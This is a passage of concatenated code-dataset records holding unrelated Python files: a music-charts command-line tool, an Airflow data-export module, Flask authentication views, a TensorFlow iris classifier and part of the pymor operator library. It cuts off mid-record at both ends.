ij in i] for i in data5])\n df5.rename(columns={0: 'Name', 1: 'Listeners', 2: 'Country'}, inplace=True)\n \n frames = [df1, df2, df3, df4, df5]\n results = pd.concat(frames)\n rdf = pd.DataFrame(results['Name'].value_counts(ascending=False))\n newrdf = rdf[:5]\n fig = go.Figure(data=[go.Pie(labels=newrdf.index, values=newrdf['Name'])])\n fig.show()\n\n#user interface\nif __name__ == '__main__':\n command = input('Welcome! Enter a command (or help for options): ')\n\n while command != 'exit':\n if command.lower() == 'help':\n print(' ')\n print('This is a list of valid commands: ')\n print('----------------------------------------------------')\n print(' ')\n print('- topartists ')\n print('description: creates a bar graph for the top 10 ')\n print(' artists in a country')\n print('parameters: takes in one country name from the ISO ')\n print(' 3166-1 list. Except USA not available')\n print(' Ex: topartists Thailand')\n print(' ')\n print('- top5pi ')\n print('description: creates a pie chart of the top 5 most ')\n print(' popular artists for 5 countries ')\n print(' that are searched')\n print('parameters: enter 5 different country names from ')\n print(' the ISO 3166-1 list with spaces ')\n print(' inbetween. ')\n print(' Ex: top5pi Nepal Spain England ... ')\n print(' ')\n print('- list')\n print('description: opens up ISO 3166-1 list for reference ')\n print('parameters: none')\n print(' ')\n print('- exit')\n print('description: exits the program')\n print('parameters: none')\n print(' ')\n elif command[:10].lower() == 'topartists':\n coun = str(command[11:].capitalize())\n get_top_country_artists(coun)\n make_artist_table()\n populate_json()\n country_bar_plot(coun)\n elif command[:6].lower() == 'top5pi':\n coun_l = str(command[7:]).split()\n compare_countries(coun_l[0].capitalize(), coun_l[1].capitalize(), coun_l[2].capitalize(), coun_l[3].capitalize(), coun_l[4].capitalize())\n elif command[:4].lower() == 'list':\n print('Launching ' + 'https://en.wikipedia.org/wiki/ISO_3166-1' + ' for you to learn some more! ')\n webbrowser.open('https://en.wikipedia.org/wiki/ISO_3166-1', new = 2)\n else:\n print('INVALID COMMAND! >:( ')\n command = input('Enter a command (or help for options): ')\n\n print('Thank you for using the program! Good Bye :) ')\n\n \n","sub_path":"final-project/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":10001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365539499","text":"import logging\n\nfrom dbnd._core.utils.timezone import utcnow\nfrom dbnd_airflow_export.dag_operations import get_dags, load_dags_models\nfrom dbnd_airflow_export.datetime_utils import pendulum_max_dt\nfrom dbnd_airflow_export.plugin_old.db_queries import (\n get_completed_task_instances_and_dag_runs,\n get_dag_runs_within_time_window,\n get_dag_runs_without_end_date,\n get_incomplete_task_instances_from_completed_dag_runs,\n get_task_instances_without_end_date,\n)\nfrom dbnd_airflow_export.plugin_old.metrics import measure_time\nfrom dbnd_airflow_export.plugin_old.model import ExportData\n\n\ndef get_dags_list_only(session, dagbag, dag_ids):\n \"\"\"\n This function returns all dags from Airflow but in their raw form - No tasks or source code are attached.\n Please do not use it in cases where either tasks or source code are required.\n \"\"\"\n load_dags_models(session)\n dags_list = get_dags(\n dagbag=dagbag, include_task_args=False, dag_ids=dag_ids, raw_data_only=True\n )\n ed = ExportData(\n task_instances=[], dag_runs=[], dags=dags_list, since=str(utcnow()),\n )\n\n return ed\n\n\n@measure_time\ndef get_complete_data(\n since,\n dag_ids,\n dagbag,\n quantity,\n include_logs,\n include_task_args,\n include_xcom,\n session,\n):\n \"\"\"\n This function returns the following data:\n 1. The first task instances that ended after since (limited by quantity). Also get their dag runs.\n 2. Dag runs that don't have task instances, but whose end_date is after since and before end_date of the most\n recent of the task instances.\n 3. All Dags of the Dag runs that we found in steps 1 and 2\n \"\"\"\n load_dags_models(session)\n\n logging.info(\"Trying to query completed task instances and dagruns from %s\" % since)\n\n task_instances, dag_runs = get_completed_task_instances_and_dag_runs(\n since, dag_ids, quantity, dagbag, include_logs, include_xcom, session\n )\n logging.info(\"%d task instances were found.\" % len(task_instances))\n\n task_end_dates = [\n task.end_date for task in task_instances if task.end_date is not None\n ]\n if not task_end_dates or not quantity or len(task_instances) < quantity:\n dag_run_end_date = pendulum_max_dt\n else:\n dag_run_end_date = max(task_end_dates)\n\n dag_runs |= get_dag_runs_within_time_window(\n since, dag_run_end_date, dag_ids, quantity, session\n )\n logging.info(\"%d dag runs were found.\" % len(dag_runs))\n\n if not dag_ids:\n dag_ids = set(dag_run.dag_id for dag_run in dag_runs)\n\n dags_list = get_dags(\n dagbag=dagbag,\n include_task_args=include_task_args,\n dag_ids=dag_ids,\n raw_data_only=False,\n )\n\n logging.info(\n \"Returning {} task instances, {} dag runs, {} dags\".format(\n len(task_instances), len(dag_runs), len(dags_list)\n )\n )\n\n ed = ExportData(\n task_instances=task_instances, dag_runs=dag_runs, dags=dags_list, since=since,\n )\n\n return ed\n\n\n@measure_time\ndef get_incomplete_data_type_1(\n since, dag_ids, dagbag, max_quantity, include_task_args, offset, session\n):\n \"\"\"\n This function returns the following data:\n 1. Task instances with end_date=None from dag runs that finished running (their end_date is not None).\n It brings only the first dag runs (limited by max_quantity) that ended after since.\n 2. All Dags of the Dag runs that we found in step 1\n \"\"\"\n load_dags_models(session)\n\n logging.info(\n \"Trying to query incomplete task instances from complete dagruns from %s\"\n % since\n )\n\n task_instances, dag_runs = get_incomplete_task_instances_from_completed_dag_runs(\n since, dag_ids, dagbag, max_quantity, offset, session\n )\n\n if not dag_ids:\n dag_ids = set(dag_run.dag_id for dag_run in dag_runs)\n\n dags_list = get_dags(\n dagbag=dagbag,\n include_task_args=include_task_args,\n dag_ids=dag_ids,\n raw_data_only=False,\n )\n\n logging.info(\n \"Returning {} task instances, {} dag runs, {} dags\".format(\n len(task_instances), len(dag_runs), len(dags_list)\n )\n )\n\n ed = ExportData(\n task_instances=task_instances, dag_runs=dag_runs, dags=dags_list, since=since,\n )\n\n return ed\n\n\n@measure_time\ndef get_incomplete_data_type_2(\n since, dag_ids, dagbag, quantity, include_task_args, incomplete_offset, session\n):\n \"\"\"\n This function returns the following data:\n 1. Task instances with end_date=None from dag runs that are running (their end_date=None). Also their dag runs.\n 2. All Dags of the Dag runs that we found in step 1\n Important: since pagination is used, the same parameters can return different results at different times.\n \"\"\"\n load_dags_models(session)\n\n logging.info(\n \"Trying to query incomplete task instances and dagruns from %s\" % since\n )\n\n task_instances, dag_runs = get_task_instances_without_end_date(\n since=since,\n dag_ids=dag_ids,\n dagbag=dagbag,\n session=session,\n incomplete_offset=incomplete_offset,\n page_size=quantity,\n )\n logging.info(\n \"Found {} task instances with no end_date from {} dag runs\".format(\n len(task_instances), len(dag_runs)\n )\n )\n\n dag_runs_without_date = get_dag_runs_without_end_date(\n since=since,\n dag_ids=dag_ids,\n session=session,\n incomplete_offset=incomplete_offset,\n page_size=quantity,\n )\n logging.info(\"Found {} dag runs with no end_date\".format(len(dag_runs)))\n\n dag_runs |= dag_runs_without_date\n\n if not dag_ids:\n dag_ids = set(dag_run.dag_id for dag_run in dag_runs)\n\n dags_list = get_dags(\n dagbag=dagbag,\n include_task_args=include_task_args,\n dag_ids=dag_ids,\n raw_data_only=False,\n )\n\n logging.info(\n \"Returning {} task instances, {} dag runs, {} dags\".format(\n len(task_instances), len(dag_runs), len(dags_list)\n )\n )\n\n ed = ExportData(\n task_instances=task_instances, dag_runs=dag_runs, dags=dags_list, since=since,\n )\n\n return ed\n","sub_path":"plugins/dbnd-airflow-export/src/dbnd_airflow_export/plugin_old/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"225809365","text":"from flask import render_template, redirect, request, url_for, flash\nfrom flask_login import login_user, login_required, logout_user\n\nfrom . import auth\nfrom .forms import LoginForm, RegisterForm\nfrom ..models import User, confirm_token\nfrom .. import db\n\n@auth.route(\"/login\", methods=[\"POST\",\"GET\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n user = (User.query.filter(User.username.ilike(form.login.data)).first() or \n User.query.filter(User.email.ilike(form.login.data)).first())\n if user is not None and user.verify_password(form.password.data):\n login_user(user, form.remember_me.data)\n flash(\"Succsefully logged in.\", \"success\")\n return redirect(request.args.get(\"next\") or url_for(\"home.home\"))\n flash(\"Invalid username or password\", \"error\")\n return render_template(\"login.html\", form=form)\n\n@auth.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n flash(\"You have been logged out.\", \"success\")\n return redirect(url_for(\"home.home\"))\n\n@auth.route(\"/register\", methods=[\"POST\", \"GET\"])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n if User.query.filter(User.username.ilike(form.username.data)).first() is not None:\n flash(\"Username is already in use.\", \"error\")\n elif User.query.filter(User.email.ilike(form.email.data)).first() is not None:\n flash(\"Email is already in use.\", \"error\")\n else:\n new_user = User(email=form.email.data,\n first=form.first.data,\n last=form.last.data,\n username=form.username.data,\n password=form.password.data)\n\n db.session.add(new_user)\n db.session.commit()\n\n token = new_user.generate_confirmation_token()\n print(url_for(\"auth.confirm\", token=token))\n return redirect(request.args.get(\"next\") or url_for(\"home.home\"))\n return render_template(\"register.html\", form=form)\n\n@auth.route(\"/confirm/\")\n@login_required\ndef confirm(token):\n error = False\n try:\n email = confirm_token(token)\n if email is None:\n error = True\n except:\n error = True\n if error:\n flash('The confirmation link is invalid or has expired.', 'error')\n return redirect(url_for(\"home.home\"))\n user = User.query.filter_by(email=email).first_or_404()\n if user.confirmed:\n flash(\"Account already confirmed. Please login.\", \"success\")\n else:\n user.confirmed = True\n db.session.add(user)\n db.session.commit()\n flash(\"You have confirmed your account. Thanks!\", \"success\")\n return redirect(url_for(\"home.home\"))\n\n","sub_path":"app/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"524516351","text":"#解决显卡内存不足的问题\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\r\n\r\n#导入所需模块\r\nimport tensorflow as tf\r\nfrom sklearn import datasets\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n#导入数据,分别输入特征和标签\r\nx_data = datasets.load_iris().data\r\ny_data = datasets.load_iris().target\r\n# print(x_data,y_data)\r\n\r\n#随机打乱数据,因为原始数据是顺序的,顺序不打乱会影响准确率\r\n#seed:随机数种植,是一个整数,当设置之后,每次生成的随机数都一样\r\nnp.random.seed(116) #使用相同的seed,保证输入特征和标签一一对应\r\nnp.random.shuffle(x_data)\r\nnp.random.seed(116)\r\nnp.random.shuffle(y_data)\r\ntf.random.set_seed(116)\r\n\r\n#将打乱后的数据集分割为训练集和测试集,训练集3/4,训练集和测试集无交集\r\nx_train = x_data[:-30]\r\ny_train = y_data[:-30]\r\nx_test = x_data[-30:]\r\ny_test = y_data[-30:]\r\n\r\n#转换x的数据类型,否则后面举证相乘时会因数据类型不一致报错\r\nx_train = tf.cast(x_train, tf.float32)\r\nx_test = tf.cast(x_test, tf.float32)\r\n# print(x_train,y_train)\r\n\r\n#.from_tensor_slices函数使输入特征和标签值一一对应,(把数据集分批次,每个批次batch组数据,此时batch=32)\r\ntrain_db = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(32)\r\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(32)\r\n\r\n#生成神经网络的参数,4个输入特征,故输入层为4个输入节点,因为3分类,故输出为3个神经元\r\n#用tf.Variable()标记参数可训练\r\n#使用seed使每次生成的随机数相同(在实际训练中,不用写seed)\r\n#声明神经网络的参数\r\nw1 = tf.Variable(tf.random.truncated_normal([4,3], stddev=0.1, seed=1))\r\nb1 = tf.Variable(tf.random.truncated_normal([3], stddev=0.1, seed=1))\r\n\r\nlr = 0.2 #学习率为0.2\r\ntrain_loss_results = [] #将每轮的loss记录在此列表中,为后续画loss曲线提供数据\r\ntest_acc = [] #将每轮的acc记录在此列表中,为后续画accs曲线提供数据\r\nepoch = 500 #循环500轮(将数据喂入500次)\r\nloss_all = 0 #每轮分4个step.loss_all记录4个step生成的loss的和,因为数据分批次喂入神经网络,所以需要求和\r\n\r\n#训练部分\r\nfor epoch in range(epoch): #数据集级别的循环,每个epoch循环一次数据集\r\n for step, (x_train, y_train) in enumerate(train_db): #batch级别的循环,每个step循环\r\n with tf.GradientTape() as tape: #with结构记录梯度信息\r\n y = tf.matmul(x_train, w1) + b1 #神经网络乘加运算\r\n y = tf.nn.softmax(y) #使输出y符合概率分布\r\n y_ = tf.one_hot(y_train, depth = 3) #将标签值转换为独热码格式,方便计算loss\r\n loss = tf.reduce_mean(tf.square(y_ - y)) #采用均方误差损失函数\r\n loss_all += loss.numpy() #将每个step算出的loss相加\r\n #计算loss对各个参数的梯度\r\n grads = tape.gradient(loss, [w1, b1])\r\n\r\n #实现梯度的更新w1=w1-lr*w1_grad b=b-lr*b_grad\r\n w1.assign_sub(lr * grads[0]) #参数w1自更新\r\n b1.assign_sub(lr * grads[1]) #参数b自更新\r\n\r\n #每个epoch,打印loss信息\r\n print(\"Epoch:{},loss:{}\".format(epoch, loss_all/4))\r\n train_loss_results.append(loss_all/4) #将4个step的loss求平均记录在此变量中\r\n loss_all = 0 #loss_all归零,为记录下一个epoch的loss做准备\r\n\r\n #测试部分\r\n #total_correct为预测对的样本个数,total_number为测试的总样本数,将这两个变量都初始化为0\r\n total_correct, total_number = 0, 0\r\n for x_test, y_test in test_db:\r\n #使用更新后的数据进行测试\r\n y = tf.matmul(x_test, w1) +b1\r\n y = tf.nn.softmax(y)\r\n pred = tf.argmax(y, axis=1) #返回y中最大的索引,即预测分类\r\n #将pred转换为y_test的数据类型\r\n pred = tf.cast(pred, dtype=y_test.dtype)\r\n #若分类正确,则correct=1,否则为0,将bool型的结果转换为int型\r\n correct = tf.cast(tf.equal(pred,y_test), dtype=tf.int32)\r\n #将每个batch的correct数加起来\r\n correct = tf.reduce_sum(correct)\r\n #将所有batch中的correct数加起来\r\n total_correct += int(correct)\r\n #total_number为测试的总样本数,也就是x_test的行数,shape[0]返回变量的行数\r\n total_number +=x_test.shape[0]\r\n #总的准确率等于total_correct/total_number\r\n acc = total_correct / total_number\r\n test_acc.append(acc)\r\n print(\"Test_acc:\", acc)\r\n print(\"-----------------\")\r\n\r\n#绘制loss曲线\r\nplt.title(\"Loss Function Curve\") #图片标题\r\nplt.xlabel(\"Epoch\") #x轴变量名称\r\nplt.ylabel(\"Loss\") #y轴变量名称\r\nplt.plot(train_loss_results, label=\"$Loss$\")\r\nplt.legend() #画出曲线图标\r\nplt.show() #画出图像\r\n\r\n#绘制Accuracy曲线\r\nplt.title(\"Acc Curve\")\r\nplt.xlabel(\"Epoch\")\r\nplt.ylabel(\"Acc\")\r\nplt.plot(test_acc, label=\"$Accuracy$\") #逐点画出test_acc值并联想,联想图标是Accuracy\r\nplt.legend()\r\nplt.show()","sub_path":"liris_CNN.py","file_name":"liris_CNN.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"153817197","text":"# -*- coding: utf-8 -*-\n# This file is part of the pyMOR project (http://www.pymor.org).\n# Copyright Holders: Rene Milk, Stephan Rave, Felix Schindler\n# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)\n\n'''This module provides some |NumPy| based |Operators| as well as base classes\nproviding some common functionality for the implementation of new |Operators|.\n\nThere are three |NumPy|-based |Operators| of interest:\n\n - |NumpyMatrixOperator| wraps a 2D |NumPy array| as a proper |Operator|.\n - |NumpyMatrixBasedOperator| should be used as base class for all |Operators|\n which assemble into a |NumpyMatrixOperator|.\n - |NumpyGenericOperator| wraps an arbitrary Python function between\n |NumPy arrays| as an |Operator|.\n\nIf you are developing new |Operators| not based on |NumPy arrays|, you should\nconsider deriving from :class:`OperatorBase`, :class:`AssemblableOperatorBase` or\n:class:`LincombOperatorBase`.\n'''\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom collections import OrderedDict\nfrom itertools import izip\nfrom numbers import Number\n\nimport numpy as np\nfrom scipy.sparse import issparse\nfrom scipy.sparse.linalg import bicgstab, spsolve, spilu, LinearOperator\nfrom scipy.io import mmwrite, savemat\n\nfrom pymor import defaults\nfrom pymor.core import abstractmethod\nfrom pymor.core.exceptions import InversionError\nfrom pymor.la.interfaces import VectorArrayInterface\nfrom pymor.la.numpyvectorarray import NumpyVectorArray\nfrom pymor.operators.interfaces import OperatorInterface, LincombOperatorInterface\nfrom pymor.parameters import ParameterFunctionalInterface\n\ntry:\n import pyamg\n HAVE_PYAMG = True\nexcept ImportError:\n HAVE_PYAMG = False\n\n\nclass OperatorBase(OperatorInterface):\n '''Base class for |Operators| providing some default implementations.'''\n\n def apply2(self, V, U, pairwise, U_ind=None, V_ind=None, mu=None, product=None):\n mu = self.parse_parameter(mu)\n assert isinstance(V, VectorArrayInterface)\n assert isinstance(U, VectorArrayInterface)\n U_ind = None if U_ind is None else np.array(U_ind, copy=False, dtype=np.int, ndmin=1)\n V_ind = None if V_ind is None else np.array(V_ind, copy=False, dtype=np.int, ndmin=1)\n if pairwise:\n lu = len(U_ind) if U_ind is not None else len(U)\n lv = len(V_ind) if V_ind is not None else len(V)\n assert lu == lv\n AU = self.apply(U, ind=U_ind, mu=mu)\n if product is not None:\n AU = product.apply(AU)\n return V.dot(AU, ind=V_ind, pairwise=pairwise)\n\n def jacobian(self, U, mu=None):\n if self.linear:\n if self.parametric:\n if hasattr(self, 'assemble'):\n return self.assemble(mu)\n else:\n from pymor.operators.constructions import FixedParameterOperator\n return FixedParameterOperator(self, mu)\n else:\n assert self.check_parameter(mu)\n return self\n else:\n raise NotImplementedError\n\n @staticmethod\n def lincomb(operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n return LincombOperator(operators, coefficients, num_coefficients, coefficients_name, name=None)\n\n def __add__(self, other):\n if isinstance(other, Number):\n assert other == 0.\n return self\n return self.lincomb([self, other], [1, 1])\n\n __radd__ = __add__\n\n def __mul__(self, other):\n assert isinstance(other, Number)\n return self.lincomb([self], [other])\n\n def __str__(self):\n return '{}: R^{} --> R^{} (parameter type: {}, class: {})'.format(\n self.name, self.dim_source, self.dim_range, self.parameter_type,\n self.__class__.__name__)\n\n def apply_inverse(self, U, ind=None, mu=None, options=None):\n raise InversionError('No inversion algorithm available.')\n\n def as_vector(self, mu=None):\n if not self.linear:\n raise TypeError('This nonlinear operator does not represent a vector or linear functional.')\n elif self.dim_source == 1 and self.type_source is NumpyVectorArray:\n return self.apply(NumpyVectorArray(1), mu=mu)\n elif self.dim_range == 1 and self.type_range is NumpyVectorArray:\n raise NotImplementedError\n else:\n raise TypeError('This operator does not represent a vector or linear functional.')\n\n def projected(self, source_basis, range_basis, product=None, name=None):\n name = name or '{}_projected'.format(self.name)\n if self.linear:\n if self.parametric:\n self.logger.warn('Using inefficient generic linear projection operator')\n # Since the bases are not immutable and we do not own them,\n # the ProjectedLinearOperator will have to create copies of them.\n return ProjectedLinearOperator(self, source_basis, range_basis, product, copy=True, name=name)\n else:\n # Here we do not need copies since the operator is immediately thrown away.\n return (ProjectedLinearOperator(self, source_basis, range_basis, product, copy=False, name=name)\n .assemble())\n else:\n self.logger.warn('Using inefficient generic projection operator')\n return ProjectedOperator(self, source_basis, range_basis, product, copy=True, name=name)\n\n\nclass AssemblableOperatorBase(OperatorBase):\n '''Base class for operators which have to be assembled.\n\n This class provides a thin wrapper around the\n :meth:`~pymor.operators.interfaces.OperatorInterface.apply`\n and :meth:`~pymor.operators.interfaces.OperatorInterface.as_vector` methods by\n calling these methods on the |Operator| which is returned\n by the :meth:`AssemblableOperatorBase._assemble` method the implementor has\n supplied. The last assembled operator is remembered, so subsequent\n :meth:`~pymor.operators.interfaces.OperatorInterface.apply` calls\n for the same |Parameter| do not lead to a re-assembly of the operator.\n It is assumed that the assembled operator is no longer |Parameter|-dependent.\n\n Attributes\n ----------\n assembled\n In case the operator is not |Parameter|-dependent, `True` if the\n operator has already been assembled.\n '''\n\n _assembled = False\n\n @property\n def assembled(self):\n return self._assembled\n\n @abstractmethod\n def _assemble(self, mu=None):\n pass\n\n def assemble(self, mu=None):\n '''Assembles the operator for a given |Parameter|.\n\n Parameters\n ----------\n mu\n The |Parameter| for which to assemble the operator.\n\n Returns\n -------\n The assembled **parameter independent** |Operator|.\n '''\n if self._assembled:\n assert self.check_parameter(mu)\n return self._last_op\n elif self.parameter_type is None:\n assert self.check_parameter(mu)\n self._last_op = self._assemble()\n self._assembled = True\n return self._last_op\n else:\n mu_s = self.strip_parameter(mu)\n if mu_s == self._last_mu:\n return self._last_op\n else:\n self._last_mu = mu_s.copy()\n self._last_op = self._assemble(mu)\n return self._last_op\n\n def apply(self, U, ind=None, mu=None):\n if not self._assembled:\n return self.assemble(mu).apply(U, ind=ind)\n elif self._last_op is not self:\n return self._last_op.apply(U, ind=ind)\n else:\n raise NotImplementedError\n\n def as_vector(self, mu=None):\n if not self._assembled:\n return self.assemble(mu).as_vector()\n elif self._last_op is not self:\n return self._last_op.as_vector()\n else:\n return super(AssemblableOperatorBase, self).as_vector(self, mu)\n\n def apply_inverse(self, U, ind=None, mu=None, options=None):\n if self._assembled:\n return self._last_op.apply_inverse(U, ind=ind, options=options)\n else:\n return self.assemble(mu).apply_inverse(U, ind=ind, options=options)\n\n _last_mu = None\n _last_op = None\n\n\nclass LincombOperatorBase(OperatorBase, LincombOperatorInterface):\n '''Base class for |LincombOperators| providing some default implementations.\n\n Parameters\n ----------\n operators\n List of |Operators| whose linear combination is formed.\n coefficients\n `None` or a list of linear coefficients.\n num_coefficients\n If `coefficients` is `None`, the number of linear coefficients (starting\n at index 0) which are given by the |Parameter| component with name\n `'coefficients_name'`. The missing coefficients are set to `1`.\n coefficients_name\n If `coefficients` is `None`, the name of the |Parameter| component providing\n the linear coefficients.\n name\n Name of the operator.\n '''\n\n def __init__(self, operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n assert coefficients is None or len(operators) == len(coefficients)\n assert len(operators) > 0\n assert all(isinstance(op, OperatorInterface) for op in operators)\n assert coefficients is None or all(isinstance(c, (ParameterFunctionalInterface, Number)) for c in coefficients)\n assert all(op.dim_source == operators[0].dim_source for op in operators[1:])\n assert all(op.dim_range == operators[0].dim_range for op in operators[1:])\n assert all(op.type_source == operators[0].type_source for op in operators[1:])\n assert all(op.type_range == operators[0].type_range for op in operators[1:])\n assert coefficients is None or num_coefficients is None\n assert coefficients is None or coefficients_name is None\n assert coefficients is not None or coefficients_name is not None\n assert coefficients_name is None or isinstance(coefficients_name, str)\n self.dim_source = operators[0].dim_source\n self.dim_range = operators[0].dim_range\n self.type_source = operators[0].type_source\n self.type_range = operators[0].type_range\n self.operators = operators\n self.coefficients = coefficients\n self.coefficients_name = coefficients_name\n self.linear = all(op.linear for op in operators)\n self.name = name\n if coefficients is None:\n self.num_coefficients = num_coefficients if num_coefficients is not None else len(operators)\n self.pad_coefficients = len(operators) - self.num_coefficients\n self.build_parameter_type({'coefficients': self.num_coefficients}, inherits=list(operators),\n global_names={'coefficients': coefficients_name})\n else:\n self.build_parameter_type(inherits=list(operators) +\n [f for f in coefficients if isinstance(f, ParameterFunctionalInterface)])\n\n def evaluate_coefficients(self, mu):\n mu = self.parse_parameter(mu)\n if self.coefficients is None:\n if self.pad_coefficients:\n return np.concatenate((self.local_parameter(mu)['coefficients'], np.ones(self.pad_coefficients)))\n else:\n return self.local_parameter(mu)['coefficients']\n\n else:\n return np.array([c.evaluate(mu) if hasattr(c, 'evaluate') else c for c in self.coefficients])\n\n def jacobian(self, U, mu=None):\n jacobians = [op.jacobian(U, mu) for op in self.operators]\n name = '{}_jacobian'.format(self.name)\n num_coefficients = getattr(self, 'num_coefficients', None)\n return type(jacobians[0]).lincomb(operators=jacobians, coefficients=self.coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=self.coefficients_name, name=name)\n\n def as_vector(self, mu=None):\n coefficients = self.evaluate_coefficients(mu)\n vectors = [op.as_vector(mu) for op in self.operators]\n R = vectors[0]\n R.scal(coefficients[0])\n for c, v in izip(coefficients[1:], vectors[1:]):\n R.axpy(c, v)\n return R\n\n def projected(self, source_basis, range_basis, product=None, name=None):\n proj_operators = [op.projected(source_basis=source_basis, range_basis=range_basis, product=product)\n for op in self.operators]\n name = name or '{}_projected'.format(self.name)\n num_coefficients = getattr(self, 'num_coefficients', None)\n return type(proj_operators[0]).lincomb(operators=proj_operators, coefficients=self.coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=self.coefficients_name, name=name)\n\n def projected_to_subbasis(self, dim_source=None, dim_range=None, name=None):\n '''See :meth:`NumpyMatrixOperator.projected_to_subbasis`.'''\n assert dim_source is None or dim_source <= self.dim_source\n assert dim_range is None or dim_range <= self.dim_range\n proj_operators = [op.projected_to_subbasis(dim_source=dim_source, dim_range=dim_range)\n for op in self.operators]\n name = name or '{}_projected_to_subbasis'.format(self.name)\n num_coefficients = getattr(self, 'num_coefficients', None)\n return type(proj_operators[0]).lincomb(operators=proj_operators, coefficients=self.coefficients,\n num_coefficients=num_coefficients,\n coefficients_name=self.coefficients_name, name=name)\n\n\nclass NumpyGenericOperator(OperatorBase):\n '''Wraps an arbitrary Python function between |NumPy arrays| as a proper\n |Operator|.\n\n Parameters\n ----------\n mapping\n The function to wrap. If `parameter_type` is `None`, the function is of\n the form `mapping(U)` and is expected to be vectorized. In particular::\n\n mapping(U).shape == U.shape[:-1] + (dim_range,).\n\n If `parameter_type` is not `None`, the function has to have the signature\n `mapping(U, mu)`.\n dim_source\n Dimension of the operator's source.\n dim_range\n Dimension of the operator's range.\n linear\n Set to `True` if the provided `mapping` is linear.\n parameter_type\n The |ParameterType| the mapping accepts.\n name\n Name of the operator.\n '''\n\n type_source = type_range = NumpyVectorArray\n\n def __init__(self, mapping, dim_source=1, dim_range=1, linear=False, parameter_type=None, name=None):\n self.dim_source = dim_source\n self.dim_range = dim_range\n self.name = name\n self._mapping = mapping\n self.linear = linear\n if parameter_type is not None:\n self.build_parameter_type(parameter_type, local_global=True)\n\n def apply(self, U, ind=None, mu=None):\n assert isinstance(U, NumpyVectorArray)\n assert U.dim == self.dim_source\n U_array = U._array[:U._len] if ind is None else U._array[ind]\n if self.parametric:\n mu = self.parse_parameter(mu)\n return NumpyVectorArray(self._mapping(U_array, mu=mu), copy=False)\n else:\n assert self.check_parameter(mu)\n return NumpyVectorArray(self._mapping(U_array), copy=False)\n\n\nclass NumpyMatrixBasedOperator(AssemblableOperatorBase):\n '''Base class for operators which assemble into a |NumpyMatrixOperator|.\n\n Attributes\n ----------\n sparse\n `True` if the operator assembles into a sparse matrix, `False` if the\n operator assembles into a dense matrix, `None` if unknown.\n '''\n\n linear = True\n type_source = type_range = NumpyVectorArray\n sparse = None\n\n @staticmethod\n def lincomb(operators, coefficients=None, num_coefficients=None, coefficients_name=None, name=None):\n if not all(isinstance(op, NumpyMatrixBasedOperator) for op in operators):\n return LincombOperator(operators, coefficients, num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n else:\n return NumpyLincombMatrixOperator(operators, coefficients, num_coefficients=num_coefficients,\n coefficients_name=coefficients_name, name=name)\n\n @property\n def invert_options(self):\n if self.sparse is None:\n raise ValueError('Sparsity unkown, assemble first.')\n elif self.sparse:\n opts = (('bicgstab-spilu', {'type': 'bicgstab-spilu',\n 'tol': defaults.bicgstab_tol,\n 'maxiter': defaults.bicgstab_maxiter,\n 'spilu_drop_tol': defaults.spilu_drop_tol,\n 'spilu_fill_factor': defaults.spilu_fill_factor,\n 'spilu_drop_rule': defaults.spilu_drop_rule,\n 'spilu_permc_spec': defaults.spilu_permc_spec}),\n ('bicgstab', {'type': 'bicgstab',\n 'tol': defaults.bicgstab_tol,\n 'maxiter': defaults.bicgstab_maxiter}),\n ('spsolve', {'type': 'spsolve',\n 'permc_spec': defaults.spsolve_permc_spec}))\n if HAVE_PYAMG:\n opts += (('pyamg', {'type': 'pyamg',\n 'tol': defaults.pyamg_tol,\n 'maxiter': defaults.pyamg_maxiter}),\n ('pyamg-rs', {'type': 'pyamg-rs',\n 'strength': defaults.pyamg_rs_strength,\n 'CF': defaults.pyamg_rs_CF,\n 'presmoother': defaults.pyamg_rs_presmoother,\n 'postsmoother': defaults.pyamg_rs_postsmoother,\n 'max_levels': defaults.pyamg_rs_max_levels,\n 'max_coarse': defaults.pyamg_rs_max_coarse,\n 'coarse_solver': defaults.pyamg_rs_coarse_solver,\n 'cycle': defaults.pyamg_rs_cycle,\n 'accel': defaults.pyamg_rs_accel,\n 'tol': defaults.pyamg_rs_tol,\n 'maxiter': defaults.pyamg_rs_maxiter}),\n ('pyamg-sa', {'type': 'pyamg-sa',\n 'symmetry': defaults.pyamg_sa_symmetry,\n 'strength': defaults.pyamg_sa_strength,\n 'aggregate': defaults.pyamg_sa_aggregate,\n 'smooth': defaults.pyamg_sa_smooth,\n 'presmoother': defaults.pyamg_sa_presmoother,\n 'postsmoother': defaults.pyamg_sa_postsmoother,\n 'improve_candidates': defaults.pyamg_sa_improve_candidates,\n 'max_levels': defaults.pyamg_sa_max_levels,\n 'max_coarse': defaults.pyamg_sa_max_coarse,\n 'diagonal_dominance': defaults.pyamg_sa_diagonal_dominance,\n 'coarse_solver': defaults.pyamg_sa_coarse_solver,\n 'cycle': defaults.pyamg_sa_cycle,\n 'accel': defaults.pyamg_sa_accel,\n 'tol': defaults.pyamg_sa_tol,\n 'maxiter': defaults.pyamg_sa_maxiter}))\n opts = OrderedDict(opts)\n def_opt = opts.pop(defaults.default_sparse_solver)\n ordered_opts = OrderedDict(((defaults.default_sparse_solver, def_opt),))\n ordered_opts.update(opts)\n return ordered_opts\n else:\n return OrderedDict((('solve', {'type': 